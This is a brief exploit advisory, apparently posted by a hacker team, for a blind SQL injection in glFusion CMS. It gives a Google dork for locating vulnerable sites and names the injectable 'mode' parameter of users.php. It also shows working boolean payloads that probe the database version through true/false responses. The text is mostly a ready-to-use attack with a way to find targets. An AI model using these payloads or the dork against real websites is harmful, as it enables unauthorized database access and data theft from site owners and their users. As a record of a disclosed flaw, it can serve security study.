= == === ====== == == == ==== === ==== ==== ==== === ==== === ==== [glFusion CMS Blind SQL injection Vulnerability] = == === ====== == == == ==== === ==== ==== ==== === ==== === ==== #Author:H3X #Cradit:Sepehr Security Team #Reference: #Product:glFusion CMS #google Dork:"Powered by glFusion CMS" #Vulnerable Version: all version #Vulnerability Type:Blind SQL Injection #Date:start[2011-02-25] ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [Vulnerability Details] ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #Exploit: /users.php?mode=[Blind_SQL_injection_here] #Example: /users.php?mode=1 and substring(version(),1,1)=4 // false /users.php?mode=1 and substring(version(),1,1)=5 // true = == === ====== == == == ==== === ==== ==== ==== === ==== === ==== Greetz:thE_knight & Einstein & Wizard our site :http://www.sepehr-team.org